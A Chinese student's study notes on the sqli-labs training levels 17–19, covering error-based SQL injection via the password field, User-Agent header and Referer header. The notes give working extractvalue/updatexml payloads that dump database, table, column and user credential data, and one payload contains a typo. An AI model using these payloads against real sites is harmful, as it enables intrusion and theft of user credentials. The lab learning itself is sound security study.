小白注入学习:sqli-labs--less17-19学习记录
Less17 基于POST显错式注入
1.在账号框测试后,无法使用数据库报错或者使是页面显示错误,前面学到的方法在这里都没有效果。查看源码后得知这道题对账号进行了check_input()的处理,但是对密码没有进行处理,所以这里直接针对密码进行sql注入。
2.User Name 输入admin ,针对密码进行注入。 通过extractvalue()函数保错式注入。
(1) 查询库名payload -1'and extractvalue(1,concat(0x7e,database()))# (2) 查询表名payload -1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))# (3) 查询列名payload -1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e
(4)查询users表中的username 和 password值
查询users表中username时报错,-1' and extractvalue(1,concat(0x7e,(select username from users limit 0,1)))#
提示 :You can't specify target table 'users' for update in FROM clause 大概意思就是不能select出表中某些值,再update这个表
解决方法: 再套一层循环,并对自循环的结果起名。这样就规避了对同一个表select 后更新,相当于是说,将子查询构成一个表,父查询再去查询这个新表。
查询username的payload -1' and extractvalue(1,concat(0x7e,(select username from (select username from users limit 0,1) abc ),0x7e))#
password的payload同理,将username换成password即可,不在赘述。
Less18 Useragent注入
1.判断注入点和注入类型
账号和密码处都无法完成注入,查看源码后发现后台对账号和密码都进行了check_input()处理,基本上无法从这两个点进行注入,但是可以观察到的正常登录后,会显示出ip 和Your User Agent ,可以考虑注入点在这两个地方。
2.用burpsuit进行抓包,查看请求的useragent和ip
在useragent处测试输入 ' ,分析页面的报错信息,我们是在useragent的后面加入单引号,但是数据库报错却是后面ip和username的部分,说明我们加入单引号后,闭合了前面的单引号逻辑正常,而导致后面的语句产生了逻辑错误。
所以猜测这数据库执行的是 insert into tbname values (?,?,?); 的数据库插入语句。
当在第一个问号处插入单引号时,报错信息满足当前的报错信息。
3.通过修改useragent的值,达到注入的目的。结合sql语句,insert into tbname values ('','','');
我们不仅需要闭合第一个单引号还需要闭合前面的括号,并且将后面的sql语句注释。当闭合括号时,需要我们为参数赋值,这样才不会产生错误。可以得出payload为
1',1,1)# 1的位置替换成其他的sql语句。
4.根据页面可以有报错,选择extractvalue()报错注入,注入点在useragent。只需要把1替换成报错语句即可。附上部分payload
查询库名 1',extractvalue(1,concat('~',database())),1)# 查询表名 1', extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) ,1)# 查询列名 1' ,extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e)),1)#
Less19 Referer注入
1.判断注入点和注入类型
此题对账号和密码进行了check_input()处理,注入点也不再账号和密码。登录后页面有ip地址和You Referer,和上一关类似,这关的注入点在Referer
2.用burpsuit进行抓包,查看request的Referer
在Referer出输入 ' 测试,可以看到报错信息与上一关类似,这里的报错信息也将ip部分报出,可以联想到这里也是用insert into语句把Referer和ip插入表中。
3.注入方法与上一题一样,闭合 ' 和) 并注释后面的sql语句 1',1)# 1位置可以替换成其他的其他的sql语句
4.选择报错注入的方法,使用upadtexml()函数,附上部分payload
查库名 1',updatexml(1,concat(0x7e,database(),0x7e),1) )# 查表名 1',updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))# 查字段名 1',update(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#
PS小白总结
(1) 寻找注入点不要拘泥于一点,只在账号或者密码出尝试注入。如果页面没有发现注入点,可以进行抓包寻找别的注入点。
(2) 根据页面的显示选择注入的方法,比如页面可以显示数据库的信息可以采取显错式注入,页面会有数据库报错选择报错式注入,没有回显信息可以选择盲注。
小白sql注入学习!!